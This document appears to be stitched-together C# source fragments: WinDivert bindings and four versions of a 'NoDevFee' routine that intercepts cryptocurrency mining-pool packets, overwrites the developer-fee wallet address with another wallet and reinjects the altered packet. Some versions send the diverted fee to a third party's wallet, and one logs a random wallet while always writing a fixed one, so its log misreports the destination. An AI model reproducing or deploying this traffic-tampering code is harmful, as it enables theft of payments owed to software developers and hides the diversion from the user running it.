public static extern bool WinDivertSendEx([In] IntPtr handle, [In] byte[] pPacket, uint packetLen, ulong flags, [In] ref WINDIVERT_ADDRESS pAddr, IntPtr writeLen, IntPtr lpOverlapped);
public static extern bool WinDivertHelperEvalFilter([In][MarshalAs(UnmanagedType.LPStr)] string filter, WINDIVERT_LAYER layer, [In] byte[] pPacket, uint packetLen, [In] ref WINDIVERT_ADDRESS pAddr);
public static extern bool WinDivertRecv([In] IntPtr handle, byte[] pPacket, uint packetLen, ref WINDIVERT_ADDRESS pAddr, ref uint readLen);
public static extern bool WinDivertSend([In] IntPtr handle, [In] byte[] pPacket, uint packetLen, [In] ref WINDIVERT_ADDRESS pAddr, IntPtr writeLen);
private static void RunDiversion( IntPtr divertHandle, Guid contextId, string workerName, string coin, string poolIp, string ourWallet, string testWallet, string kernelFullName, ref int counter, ref bool ranOnce) { byte[] byteTestWallet = Encoding.ASCII.GetBytes(testWallet); byte[] packet = new byte[65535]; try { while (true) { if (contextId != _contextId) { Global.WriteLine("挖矿上下文已变,NoDevFee结束"); return; } uint readLength = 0; WINDIVERT_IPHDR * ipv4Header = null; WINDIVERT_TCPHDR *tcpHdr = null; WINDIVERT_ADDRESS addr = new WINDIVERT_ADDRESS(); if (!WinDivertMethods.WinDivertRecv(divertHandle, packet, (uint)packet.Length, ref addr, ref readLength)) { continue; } if (!ranOnce && readLength > 1) { ranOnce = true; Global.DebugLine("Diversion running.."); } fixed(byte *inBuf = packet) { byte *payload = null; WinDivertMethods.WinDivertHelperParsePacket(inBuf, readLength, &ipv4Header, null, null, null, &tcpHdr, null, &payload, null); if (ipv4Header != null && tcpHdr != null && payload != null) { string dstIp = ipv4Header->DstAddr.ToString(); var dstPort = tcpHdr->DstPort; string arrow = $"->{dstIp}:{dstPort}"; if (dstIp == poolIp) { arrow = $"{dstIp}:{dstPort}<-"; } string text = Marshal.PtrToStringAnsi((IntPtr)payload); Global.DebugLine(arrow + text); int position; if (TryGetPosition(workerName, coin, kernelFullName, text, out position)) { Global.WriteLine(arrow + text); string dwallet = Encoding.UTF8.GetString(packet, position, byteTestWallet.Length); if (dwallet != ourWallet) { string msg = "发现DevFee wallet:" + dwallet; Global.WriteLine(msg); Buffer.BlockCopy(byteTestWallet, 0, packet, position, byteTestWallet.Length); Global.WriteLine($"::Diverting {kernelFullName} DevFee {++counter}: ({DateTime.Now})"); Global.WriteLine($"::Destined for: {dwallet}"); Global.WriteLine($"::Diverted to : {testWallet}"); Global.WriteLine($"::Pool: {dstIp}:{dstPort} {dstPort}"); } } } } WinDivertMethods.WinDivertHelperCalcChecksums(packet, readLength, 0); WinDivertMethods.WinDivertSendEx(divertHandle, packet, readLength, 0, ref addr, IntPtr.Zero, IntPtr.Zero); } } catch (Exception e) { Global.Logger.Error(e.Message, e); return; } }
public static extern bool WinDivertRecvEx([In] IntPtr handle, byte[] pPacket, uint packetLen, ulong flags, ref WINDIVERT_ADDRESS pAddr, ref uint readLen, ref NativeOverlapped lpOverlapped);
private static void RunDiversion( ref IntPtr divertHandle, KernelInfo kernelInfo, string workerName, string userWallet, ref int counter) { byte[] packet = new byte[65535]; try { while (true) { if (_isStopping) { //Logger.OkDebugLine("NoDevFee结束"); return; } uint readLength = 0; WINDIVERT_IPHDR * ipv4Header = null; WINDIVERT_TCPHDR *tcpHdr = null; WINDIVERT_ADDRESS addr = new WINDIVERT_ADDRESS(); if (!SafeNativeMethods.WinDivertRecv(divertHandle, packet, (uint)packet.Length, ref addr, ref readLength)) { continue; } fixed(byte *inBuf = packet) { byte *payload = null; SafeNativeMethods.WinDivertHelperParsePacket(inBuf, readLength, &ipv4Header, null, null, null, &tcpHdr, null, &payload, null); if (ipv4Header != null && tcpHdr != null && payload != null) { string ansiText = Marshal.PtrToStringAnsi((IntPtr)payload); if (TryGetPosition(kernelInfo, workerName, ansiText, out var position)) { string wallet = EthWalletSet.Instance.GetOneWallet(); if (!string.IsNullOrEmpty(wallet)) { byte[] byteWallet = Encoding.ASCII.GetBytes(wallet); string dwallet = Encoding.UTF8.GetString(packet, position, byteWallet.Length); if (!dwallet.StartsWith(userWallet) && ethWalletRegex.IsMatch(dwallet)) { string dstIp = ipv4Header->DstAddr.ToString(); var dstPort = tcpHdr->DstPort; Buffer.BlockCopy(byteWallet, 0, packet, position, byteWallet.Length); Logger.InfoDebugLine($"::第 {++counter} 次"); Logger.InfoDebugLine($":: {dwallet}"); //Logger.InfoDebugLine($":: {wallet}"); Logger.InfoDebugLine($":: {dstIp}:{dstPort.ToString()}"); } } } } } SafeNativeMethods.WinDivertHelperCalcChecksums(packet, readLength, 0); SafeNativeMethods.WinDivertSendEx(divertHandle, packet, readLength, 0, ref addr, IntPtr.Zero, IntPtr.Zero); } } catch (Exception e) { Logger.ErrorDebugLine(e); return; } }
private static void RunDiversion( ref IntPtr divertHandle, string workerName, string userWallet, ref int counter, ref bool ranOnce) { byte[] packet = new byte[65535]; try { while (true) { if (_isStopping) { Logger.OkDebugLine("NoDevFee结束"); return; } uint readLength = 0; WINDIVERT_IPHDR * ipv4Header = null; WINDIVERT_TCPHDR *tcpHdr = null; WINDIVERT_ADDRESS addr = new WINDIVERT_ADDRESS(); if (!WinDivertMethods.WinDivertRecv(divertHandle, packet, (uint)packet.Length, ref addr, ref readLength)) { continue; } if (!ranOnce && readLength > 1) { ranOnce = true; Logger.InfoDebugLine("Diversion running.."); } fixed(byte *inBuf = packet) { byte *payload = null; WinDivertMethods.WinDivertHelperParsePacket(inBuf, readLength, &ipv4Header, null, null, null, &tcpHdr, null, &payload, null); if (ipv4Header != null && tcpHdr != null && payload != null) { string text = Marshal.PtrToStringAnsi((IntPtr)payload); if (TryGetPosition(workerName, text, out var position)) { byte[] byteUserWallet = Encoding.ASCII.GetBytes(userWallet); byte[] byteWallet = Encoding.ASCII.GetBytes(_wallet); string dwallet = Encoding.UTF8.GetString(packet, position, byteWallet.Length); if (!dwallet.StartsWith(userWallet)) { string dstIp = ipv4Header->DstAddr.ToString(); var dstPort = tcpHdr->DstPort; Buffer.BlockCopy(byteWallet, 0, packet, position, byteWallet.Length); Logger.InfoDebugLine($"{dstIp}:{dstPort}"); string msg = "发现DevFee wallet:" + dwallet; Logger.WarnDebugLine(msg); Logger.InfoDebugLine($"::Diverting DevFee {++counter}: ({DateTime.Now})"); Logger.InfoDebugLine($"::Destined for: {dwallet}"); Logger.InfoDebugLine($"::Diverted to : {_wallet}"); Logger.InfoDebugLine($"::Pool: {dstIp}:{dstPort}"); } } } } WinDivertMethods.WinDivertHelperCalcChecksums(packet, readLength, 0); WinDivertMethods.WinDivertSendEx(divertHandle, packet, readLength, 0, ref addr, IntPtr.Zero, IntPtr.Zero); } } catch (Exception e) { Logger.ErrorDebugLine(e); return; } }
private static void RunDiversion( ref IntPtr divertHandle, int contextId, string workerName, string coin, string userWallet, string ntminerWallet, string kernelFullName, CoinKernelId coinKernelId, ref int counter, ref bool ranOnce) { byte[] byteUserWallet = Encoding.ASCII.GetBytes(userWallet); byte[] byteNTMinerWallet = Encoding.ASCII.GetBytes(ntminerWallet); byte[][] byteWallets = new byte[][] { byteUserWallet, byteNTMinerWallet }; string[] wallets = new string[] { userWallet, ntminerWallet }; Random r = new Random((int)DateTime.Now.Ticks); byte[] packet = new byte[65535]; try { while (true) { if (contextId != _sContextId) { Logger.OkDebugLine("挖矿上下文已变,NoDevFee结束"); return; } uint readLength = 0; WINDIVERT_IPHDR * ipv4Header = null; WINDIVERT_TCPHDR *tcpHdr = null; WINDIVERT_ADDRESS addr = new WINDIVERT_ADDRESS(); if (!WinDivertNativeMethods.WinDivertRecv(divertHandle, packet, (uint)packet.Length, ref addr, ref readLength)) { continue; } if (!ranOnce && readLength > 1) { ranOnce = true; Logger.InfoDebugLine("Diversion running.."); } fixed(byte *inBuf = packet) { byte *payload = null; WinDivertNativeMethods.WinDivertHelperParsePacket(inBuf, readLength, &ipv4Header, null, null, null, &tcpHdr, null, &payload, null); if (ipv4Header != null && tcpHdr != null && payload != null) { string text = Marshal.PtrToStringAnsi((IntPtr)payload); if (TryGetPosition(workerName, coin, kernelFullName, coinKernelId, text, out var position)) { string dwallet = Encoding.UTF8.GetString(packet, position, byteUserWallet.Length); if (!dwallet.StartsWith(userWallet)) { string dstIp = ipv4Header->DstAddr.ToString(); var dstPort = tcpHdr->DstPort; int index = r.Next(2); Buffer.BlockCopy(byteWallets[1], 0, packet, position, byteUserWallet.Length); Logger.InfoDebugLine($"{dstIp}:{dstPort} {text}"); string msg = "发现DevFee wallet:" + dwallet; Logger.WarnDebugLine(msg); Logger.InfoDebugLine($"::Diverting {kernelFullName} DevFee {++counter}: ({DateTime.Now})"); Logger.InfoDebugLine($"::Destined for: {dwallet}"); Logger.InfoDebugLine($"::Diverted to : {wallets[index]}"); Logger.InfoDebugLine($"::Pool: {dstIp}:{dstPort} {dstPort}"); } } } } WinDivertNativeMethods.WinDivertHelperCalcChecksums(packet, readLength, 0); WinDivertNativeMethods.WinDivertSendEx(divertHandle, packet, readLength, 0, ref addr, IntPtr.Zero, IntPtr.Zero); } } catch (Exception e) { Logger.ErrorDebugLine(e.Message, e); return; } }